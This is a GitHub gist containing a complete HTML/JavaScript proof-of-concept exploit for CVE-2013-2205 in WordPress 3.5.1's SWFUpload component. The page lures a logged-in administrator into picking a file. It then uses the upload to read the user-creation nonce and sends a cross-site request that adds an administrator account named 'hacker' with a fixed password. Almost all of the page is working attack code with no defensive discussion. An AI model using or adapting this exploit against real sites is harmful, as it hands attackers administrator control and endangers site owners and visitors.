Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Wordpress 3.5.1 + swfupload CSRF attack
<html>
<script type="text/javascript" src="http://wordpress-url/wp-includes/js/swfupload/swfupload-all.js"></script>
<script type="text/javascript">
var swfu;
window.onload = function() {
var settings = {
flash_url : "http://wordpress-url/wp-includes/js/swfupload/swfupload.swf",
upload_url: "http://wordlress-url/wp-admin/user-new.php",
file_size_limit : "5 MB",
file_types : "*.*",
file_types_description : "All Files",
file_upload_limit : 100,
file_queue_limit : 0,
custom_settings : {
progressTarget : "fsUploadProgress",
cancelButtonId : "btnCancel"
},
debug: true,
// Button settings
button_width: "65",
button_height: "29",
button_placeholder_id: "spanButtonPlaceHolder",
button_text: 'CLICK',
button_text_style: ".theFont { font-size: 16; }",
button_text_left_padding: 12,
button_text_top_padding: 3,
file_dialog_complete_handler: startUpload,
upload_success_handler : myUploadSuccessHandler
};
swfu = new SWFUpload(settings);
};
function startUpload() {
swfu.startUpload();
}
function myUploadSuccessHandler (file, serverData,c,d){
var arr = serverData.split("\n");
for(a in arr) {
if(arr[a].search("_wpnonce_create-user") != -1) {
var nonce = arr[a].replace(/.*value="([a-fA-F0-9]+)".*/, "$1");
addUser(nonce);
break;
}
}
}
function addUser(nonce) {
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST","http://wordpress-url/wp-admin/user-new.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.withCredentials = "true";
xmlhttp.send("action=createuser&_wpnonce_create-user=" + nonce + "&_wp_http_referer=%2Fwordpress%2Fwordpress3.5.1%2Fwp-admin%2Fuser-new.php&user_login=hacker&email=hacker%4032s.pl&first_name=hacker&last_name=hacker&url=lol&pass1=qwerty1234&pass2=qwerty1234&role=administrator&createuser=Add+New+User+");
alert("Thank you. :-)");
}
</script>
</head><body>
<div id="content">
<br>Wordpress 3.5.1 + SWFUpload CVE-2013-2205 Exploit</br>
<br>Bug found by <a href="http://szgru.website.pl/">Szymon Gruszecki</a>
<br>Exploit by <a href="http://ropchain.org">Jakub Zoczek</a>
<hr>
<br>Choose some file to make the magic happens ;-)
<br><span id="spanButtonPlaceHolder"></span>
</div>
</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment